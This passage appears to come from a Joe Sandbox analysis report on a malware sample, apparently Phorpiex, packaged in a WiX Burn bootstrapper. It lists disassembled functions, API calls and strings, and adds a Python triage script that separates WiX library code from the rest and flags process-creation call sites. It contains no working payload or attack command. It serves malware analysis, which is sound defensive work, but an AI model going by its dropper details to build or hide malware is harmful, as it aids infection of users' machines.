                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 0040FD87
                                                                                                                                                          • WaitForInputIdle.USER32(?,?), ref: 0040FDEB
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040FE34
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040FE46
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle$CreateErrorIdleInputLastProcessWait
                                                                                                                                                          • String ID: "%ls"$"%ls" %s$D$Failed to CreateProcess on path: %ls$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$d:\a\wix\wix\src\burn\engine\approvedexe.cpp
                                                                                                                                                          • API String ID: 1086122317-3438387657
                                                                                                                                                          • Opcode ID: bce683bf1b6a12c899a81b44e5a9817ed7c59222f7e93627dd3f633445f79ce2
                                                                                                                                                          • Instruction ID: 5d8278ecadf702d2dc8b21c4abb2dcae60f6b46576193c6b46e2d465fbadc766
                                                                                                                                                          • Opcode Fuzzy Hash: bce683bf1b6a12c899a81b44e5a9817ed7c59222f7e93627dd3f633445f79ce2
                                                                                                                                                          • Instruction Fuzzy Hash: D571BD71E40219BBEB21AE91CD46FDEBB78EF04704F10407AFA04B65E1D3789A549B98
                                                                                                                                                          APIs
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00472A28
                                                                                                                                                            • Part of subcall function 00470ABB: RegCloseKey.ADVAPI32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 00470B65
                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,00000000,00000000,?,?,00000078,000000FF,00000000,?,?,?,00000078,000000FF,?,?,00000078), ref: 00472B65
                                                                                                                                                          • CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF,00000000,?,?,?,00000078,000000FF,?,?,00000078), ref: 00472B74
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close$DeleteErrorFileHandleLast
                                                                                                                                                          • String ID: Burn$DownloadTimeout$Failed to copy download source URL.$Failed to download URL: %ls$Failed to open internet session$Ignoring failure to get size and time for URL: %ls (error 0x%x)$RgG$WiX\Burn$\gG$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dlutil.cpp$zgG
                                                                                                                                                          • API String ID: 3163412224-4053184269
                                                                                                                                                          • Opcode ID: 64812b771fd23e892ae14f99fb75648c2fd6fe3af8af88ead69ea182c6035115
                                                                                                                                                          • Instruction ID: d29179a8cf859b2d4a7a6111097e064df2dc7409cb3583fac74b3fbbd4969c1d
                                                                                                                                                          • Opcode Fuzzy Hash: 64812b771fd23e892ae14f99fb75648c2fd6fe3af8af88ead69ea182c6035115
                                                                                                                                                          • Instruction Fuzzy Hash: E2515D72D40219BFDB219FA48D45FEF7B78EF04711F008166FA08F6191E7789A119BA8
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,name,000000FF,00000000,00000000,00000000,?), ref: 00473435
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0047355C
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to allocate ATOM author name., xrefs: 00473453
                                                                                                                                                          • Failed to get child nodes of ATOM author element., xrefs: 004733E6
                                                                                                                                                          • Failed to allocate ATOM author email., xrefs: 00473494
                                                                                                                                                          • email, xrefs: 00473469
                                                                                                                                                          • Failed to process all ATOM author elements., xrefs: 00473521
                                                                                                                                                          • Failed to allocate ATOM author uri., xrefs: 0047353F
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 004733F5, 00473530
                                                                                                                                                          • name, xrefs: 00473427
                                                                                                                                                          • uri, xrefs: 004734AA
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$CompareFree
                                                                                                                                                          • String ID: Failed to allocate ATOM author email.$Failed to allocate ATOM author name.$Failed to allocate ATOM author uri.$Failed to get child nodes of ATOM author element.$Failed to process all ATOM author elements.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$email$name$uri
                                                                                                                                                          • API String ID: 3589242889-868808450
                                                                                                                                                          • Opcode ID: 0da66959b69b0b7a47b190c69e756c3c985ed3a4a9b25ae81097b2f76e026568
                                                                                                                                                          • Instruction ID: d1c6ceb3ec8629548df5a4805c4e5e153f63d1dae9502cbb3aae93c9a8f705f2
                                                                                                                                                          • Opcode Fuzzy Hash: 0da66959b69b0b7a47b190c69e756c3c985ed3a4a9b25ae81097b2f76e026568
                                                                                                                                                          • Instruction Fuzzy Hash: 4451F531A44205FBDF119F94CC49F9E3775AB50726F20819AF619BB2E0DB789B00EB58
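The function blocks above record which Win32 calls each disassembled routine makes and which strings it references. The d:\a\wix\wix\src\... paths in the string tables show that these particular routines are WiX Burn bootstrapper library code (dutil's pathutil, atomutil and dlutil, and the Burn engine's approvedexe) compiled into the sample, not Phorpiex's own logic; the CreateProcessW and download call sites are still the ones to open first, because that is where the bundle hands control to whatever it carries. The Python below is an added example, not part of the Joe Sandbox report or of WiX: it parses blocks in exactly this layout, attributes each block to its WiX source file, separates direct calls from "Part of subcall" entries, and lists the process-creation call sites. The sample text is constructed from lines in this section, and the origin labels ("wix-dutil", "wix-burn-engine") are the example's own naming.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: three function blocks in the report's layout (copied from this section).
SAMPLE = """\
APIs
• CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000200,00000000,?,00000044,?,?,?,?,?), ref: 0040FD7D
• GetLastError.KERNEL32(?,?,?,?), ref: 0040FD87
• WaitForInputIdle.USER32(?,?), ref: 0040FDEB
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040FE34
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseHandle$CreateErrorIdleInputLastProcessWait
• String ID: "%ls"$"%ls" %s$D$Failed to CreateProcess on path: %ls$d:\\a\\wix\\wix\\src\\burn\\engine\\approvedexe.cpp
• API String ID: 1086122317-3438387657
APIs
• GetLastError.KERNEL32 ref: 00472A28
  • Part of subcall function 00470ABB: RegCloseKey.ADVAPI32(00000000,00000000), ref: 00470B65
• DeleteFileW.KERNEL32(00000000,00000000), ref: 00472B65
Strings
Similarity
• API ID: Close$DeleteErrorFileHandleLast
• String ID: Burn$DownloadTimeout$Failed to download URL: %ls$Failed to open internet session$d:\\a\\wix\\wix\\src\\libs\\dutil\\wixtoolset.dutil\\dlutil.cpp
APIs
• CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,name,000000FF), ref: 00473435
• SysFreeString.OLEAUT32(00000000), ref: 0047355C
Strings
• Failed to allocate ATOM author name., xrefs: 00473453
• d:\\a\\wix\\wix\\src\\libs\\dutil\\wixtoolset.dutil\\atomutil.cpp, xrefs: 004733F5, 00473530
• name, xrefs: 00473427
Similarity
• API ID: String$CompareFree
• String ID: Failed to allocate ATOM author name.$name$uri
"""

HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "Api.MODULE(args), ref: ADDR"; the parens and the comma are absent on some lines.
API_RE = re.compile(r"^• (?P<api>\w+)\.(?P<mod>[\w.]+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
SUBCALL_RE = re.compile(r"^• Part of subcall function (?P<caller>[0-9A-F]{8}): "
                        r"(?P<api>\w+)\.(?P<mod>[\w.]+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
XREF_RE = re.compile(r"^• (?P<text>.*), xrefs: (?P<refs>[0-9A-F]{8}(?:, [0-9A-F]{8})*)$")
FIELD_RE = re.compile(r"^• (?P<key>[A-Za-z ]+?): (?P<val>.*)$")


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)      # (api, module, ref) called by this function
    subcalls: list = field(default_factory=list)  # (caller, api, module, ref) reached via a callee
    strings: dict = field(default_factory=dict)   # string text -> list of xref addresses
    fields: dict = field(default_factory=dict)    # Memory Dump Source / Similarity key-values

    def string_ids(self):
        # The Similarity "String ID" field is "$"-joined; it repeats the string table.
        return [s for s in self.fields.get("String ID", "").split("$") if s]

    def source_files(self):
        paths = [s for s in list(self.strings) + self.string_ids() if s.lower().endswith(".cpp")]
        return sorted(set(paths))

    def origin(self):
        # Example's own labels: WiX paths mark library code rather than the payload.
        for path in self.source_files():
            p = path.lower()
            if "\\wix\\" in p:
                return "wix-burn-engine" if "\\burn\\engine\\" in p else "wix-dutil"
        return "unknown"


def parse_blocks(text):
    """Split report text into FunctionBlocks; a new block starts at every 'APIs' header."""
    blocks, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADERS:
            if line == "APIs":
                cur = FunctionBlock()
                blocks.append(cur)
            section = line
            continue
        if cur is None:
            continue
        if section == "APIs":
            m = SUBCALL_RE.match(line)
            if m:
                cur.subcalls.append((m["caller"], m["api"], m["mod"], m["ref"]))
                continue
            m = API_RE.match(line)
            if m:
                cur.apis.append((m["api"], m["mod"], m["ref"]))
        elif section == "Strings":
            m = XREF_RE.match(line)
            if m:
                cur.strings[m["text"]] = m["refs"].split(", ")
        else:
            m = FIELD_RE.match(line)
            if m:
                cur.fields[m["key"]] = m["val"]
    return blocks


def summarize(text):
    """Triage view: where each block came from and which call sites to inspect first."""
    blocks = parse_blocks(text)
    return {
        "blocks": len(blocks),
        "origins": [b.origin() for b in blocks],
        "source_files": sorted({f for b in blocks for f in b.source_files()}),
        "api_names": sorted({a for b in blocks for a, _, _ in b.apis}),
        "process_creation": [(a, r) for b in blocks for a, _, r in b.apis if a.startswith("CreateProcess")],
    }


if __name__ == "__main__":
    for k, v in summarize(SAMPLE).items():
        print(f"{k}: {v}")
```

Run against a whole report export, the `origins` list tells you how much of the disassembly is WiX framework code that can be skipped, and `process_creation` gives the addresses (here 0040FD7D in approvedexe.cpp) where the bootstrapper launches the executable it carries.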
APIs
• SetEvent.KERNEL32(?,?,00000004,00000007,00000000,00000001,00000000,?), ref: 0044DCBD
• GetLastError.KERNEL32 ref: 0044DCCB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: ErrorEventLast
• String ID: BA aborted cache.$Cache prepare package failed: %ls$Cancel during cache: %ls$Failed cache action: %ls$Failed to allocate cache search paths array.$Failed to ensure acquisition folder.$Failed to set syncpoint event.$cache package$d:\a\wix\wix\src\burn\engine\apply.cpp$layout bundle$layout container
• API String ID: 3848097054-4290225686
• Opcode ID: 38635bb5f02cb2c2ea94759cd9411876fe597ccee5a665a7dbc5355121e12b02
• Instruction ID: f8455ca099ae7d616808e7403c96ce71b716575fd57cb65740ae72f2345e81cb
• Opcode Fuzzy Hash: 38635bb5f02cb2c2ea94759cd9411876fe597ccee5a665a7dbc5355121e12b02
• Instruction Fuzzy Hash: DCB10171E40614BBEF219E55CC4AFAF7E64AF44B24F21412BF904BB2C1D6B89801CB98
APIs
  • Part of subcall function 00405811: GetFileSizeEx.KERNEL32(00000000,00000000,?,00000000,?,?,?,0040F92E,0100147D,?,?,00000000,00000000), ref: 00405829
  • Part of subcall function 00405811: GetLastError.KERNEL32(?,?,?,0040F92E,0100147D,?,?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 00405833
• SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?), ref: 00404A57
• SetEndOfFile.KERNEL32(?), ref: 00404A63
• GetLastError.KERNEL32 ref: 00404A6D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: File$ErrorLast$PointerSize
• String ID: Failed to get size of source.$Failed to read from source.$Failed to reset target file pointer.$Failed to set end of target file.$Failed to write to target.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
• API String ID: 1903691966-3248098685
• Opcode ID: ec43ba1a0825121eceb761ba6f26ef7d30dfd88a777efe582723627243e86e1c
• Instruction ID: 34e2274c5cd205b5dbdbb822fe88d6eb8b20e6791624f411feb5617856b7e8f6
• Opcode Fuzzy Hash: ec43ba1a0825121eceb761ba6f26ef7d30dfd88a777efe582723627243e86e1c
• Instruction Fuzzy Hash: 5691CFB1A4012997DB319E148C44FEF7675EB88750F1140BAFA48B7290D6B8DEC09F98
APIs
  • Part of subcall function 00470DEA: FindResourceExA.KERNEL32(00000000,0000000A,?,00000000), ref: 00470DFB
  • Part of subcall function 00470DEA: GetLastError.KERNEL32(?,0042BBEB,004080B0,00000001,?,00000000,?,00000000,?,?,?,00000000,?,?,00000003,00000000), ref: 00470E07
• CloseHandle.KERNEL32(00000000,004080B0,00000001,?,00000000,?,00000000,?,?,?,00000000,?,?,00000003), ref: 0042BD4D
• CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,?,?,00000000,?,?), ref: 0042BD62
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CloseHandle$ErrorFindLastResource
• String ID: Failed to create UI thread.$Failed to create modal event.$Failed to load splash screen configuration.$Failed to read splash screen configuration resource.$Invalid splash screen type: %i$d:\a\wix\wix\src\burn\engine\splashscreen.cpp
• API String ID: 3960716503-562085312
• Opcode ID: 4a6c28fe9f66eb1bd8a1d23df8c54b588a30ae6e37c87b59c45f25c0eec25732
• Instruction ID: 7dc44aecbd025529a602826fc3fa35b3c97832e5b8968647445c10648b93af37
• Opcode Fuzzy Hash: 4a6c28fe9f66eb1bd8a1d23df8c54b588a30ae6e37c87b59c45f25c0eec25732
• Instruction Fuzzy Hash: 0A412571A40215BBE711AF959C45FDF7BB9EB44710F50042BFA00B62D1E7B899408BA9
APIs
  • Part of subcall function 00467AAE: RegCloseKey.ADVAPI32(00000000,00000000,00000000,00020019,00000000,00000000,00000000,?,?,004165D9,80000002,SOFTWARE\Microsoft\ServerManager,CurrentRebootAttempts,00000000,00000214,00000000), ref: 00467B4B
• RegCloseKey.ADVAPI32(00000120,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending,00000000,00000000,80000002,SOFTWARE\Microsoft\Updates,UpdateExeVolatile,00000000,00000214,80000002,SOFTWARE\Microsoft\ServerManager,CurrentRebootAttempts,00000000,00000214,00000000), ref: 004166CF
Strings
• PendingFileRenameOperations2, xrefs: 0041666D
• SYSTEM\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 0041668D
• CurrentRebootAttempts, xrefs: 004165C1
• SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update, xrefs: 00416640
• SOFTWARE\Microsoft\ServerManager, xrefs: 004165C6
• SOFTWARE\Microsoft\Updates, xrefs: 004165F0
• SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending, xrefs: 0041660A
• PendingFileRenameOperations, xrefs: 00416656
• SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 0041665B, 00416672
• AUState, xrefs: 0041663B
• SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootInProgress, xrefs: 00416621
• UpdateExeVolatile, xrefs: 004165EB
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: Close
• String ID: AUState$CurrentRebootAttempts$PendingFileRenameOperations$PendingFileRenameOperations2$SOFTWARE\Microsoft\ServerManager$SOFTWARE\Microsoft\Updates$SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootInProgress$SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending$SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update$SYSTEM\CurrentControlSet\Control\Session Manager$SYSTEM\CurrentControlSet\Control\Session Manager\FileRenameOperations$UpdateExeVolatile
• API String ID: 3535843008-3032311648
• Opcode ID: 6208c273424f2a86ffd60d00c0fa8227034b7d02686f007b82c7ddb4781ce823
• Instruction ID: 40272b065c2383fe7cd34076f0aacd5b9a5873f36aaa9c95f916ec775eee68f9
• Opcode Fuzzy Hash: 6208c273424f2a86ffd60d00c0fa8227034b7d02686f007b82c7ddb4781ce823
• Instruction Fuzzy Hash: FA31EAB1E80755B78B31A6668C45DEFBA7CDA80B48B22055BF800B2112E67CDD45C77C
APIs
• EnterCriticalSection.KERNEL32(00000000,0040951C,00000000,0040959C,?,?,0040CFC4,00000002,?,7D89F88B,00000000), ref: 0040B856
  • Part of subcall function 00409A72: CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,00000000,?,0040AFB0,0040AFB0,?,004098C0,?,?,00000000), ref: 00409AAE
  • Part of subcall function 00409A72: GetLastError.KERNEL32(?,004098C0,?,?,00000000,?,00000000,0040AFB0,?,0040CB94,?,?,?,?,?), ref: 00409ADD
• LeaveCriticalSection.KERNEL32(00000000,?,?,00000000,7D89F88B,00000000), ref: 0040BA1D
Strings
• Unsetting variable '%ls', xrefs: 0040B9B2
• formatted, xrefs: 0040B993
• Setting version variable '%ls' to value '%ls', xrefs: 0040B962
• d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040B8ED, 0040BA0F
• string, xrefs: 0040B99A, 0040B9A2
• Setting %ls variable '%ls' to value '%ls', xrefs: 0040B9A3
• Failed to find variable value '%ls'., xrefs: 0040B871
• Setting hidden variable '%ls', xrefs: 0040B936
• Failed to insert variable '%ls'., xrefs: 0040B89E
• Failed to set value of variable: %ls, xrefs: 0040B9FD
• Setting numeric variable '%ls' to value %lld, xrefs: 0040B979
• Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 0040BA2F
• Attempt to set built-in variable value: %ls, xrefs: 0040B8F8
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: CriticalSection$CompareEnterErrorLastLeaveString
• String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting %ls variable '%ls' to value '%ls'$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%ls'$Unsetting variable '%ls'$d:\a\wix\wix\src\burn\engine\variable.cpp$formatted$string
• API String ID: 2716280545-4124691947
• Opcode ID: 5b68d3b1d3f380f7a6a1159d6f83e253df8e2de35c3ced3d6910c3d299951a66
• Instruction ID: d75be4dc490acd777b564a1eadb3e7de4efd0e02d22c893c3a3754f371a3e486
• Opcode Fuzzy Hash: 5b68d3b1d3f380f7a6a1159d6f83e253df8e2de35c3ced3d6910c3d299951a66
• Instruction Fuzzy Hash: 1F510471644250BBDB319E15CC4AF977A68DB81B04F20403BFA087A2D2D3BD9940CAEE
                                                                                                                                                          APIs
                                                                                                                                                          • Sleep.KERNEL32(000007D0,00000008,?,00000000,?,?), ref: 00419BF3
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\logging.cpp, xrefs: 00419AFB, 00419B21, 00419C84
                                                                                                                                                          • log, xrefs: 00419BA3
                                                                                                                                                          • Failed to copy log file path from command line., xrefs: 00419AED
                                                                                                                                                          • Failed to get non-session specific TEMP folder., xrefs: 00419D4F
                                                                                                                                                          • Failed to copy log path to prefix., xrefs: 00419DAD
                                                                                                                                                          • Failed to copy full log path to prefix., xrefs: 00419E05
                                                                                                                                                          • Setup, xrefs: 00419B74
                                                                                                                                                          • Failed to copy log extension to extension., xrefs: 00419DDA
                                                                                                                                                          • Failed to initialize logging., xrefs: 00419B16
                                                                                                                                                          • Failed to copy default log extension., xrefs: 00419BB4
                                                                                                                                                          • Failed to get parent directory from '%ls'., xrefs: 00419CFA
                                                                                                                                                          • Failed to open log: %ls, xrefs: 00419C72
                                                                                                                                                          • Failed to copy default log prefix., xrefs: 00419B85
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Sleep
                                                                                                                                                          • String ID: Failed to copy default log extension.$Failed to copy default log prefix.$Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log file path from command line.$Failed to copy log path to prefix.$Failed to get non-session specific TEMP folder.$Failed to get parent directory from '%ls'.$Failed to initialize logging.$Failed to open log: %ls$Setup$d:\a\wix\wix\src\burn\engine\logging.cpp$log
                                                                                                                                                          • API String ID: 3472027048-3281194130
                                                                                                                                                          • Opcode ID: 72fcfabbd8645d24726cd60012cd211c8a0632b62d19165ca35e5117a22098f2
                                                                                                                                                          • Instruction ID: a68c656b461b79c70987de18d7a1fbd448c366965086efab4b0f35907c67c0d0
                                                                                                                                                          • Opcode Fuzzy Hash: 72fcfabbd8645d24726cd60012cd211c8a0632b62d19165ca35e5117a22098f2
                                                                                                                                                          • Instruction Fuzzy Hash: 57B1F771A44316BADB21DE65CC51FEB77A8EF04700F10452BF905AB2D1E7B8AD8087A9
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF), ref: 0042837D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
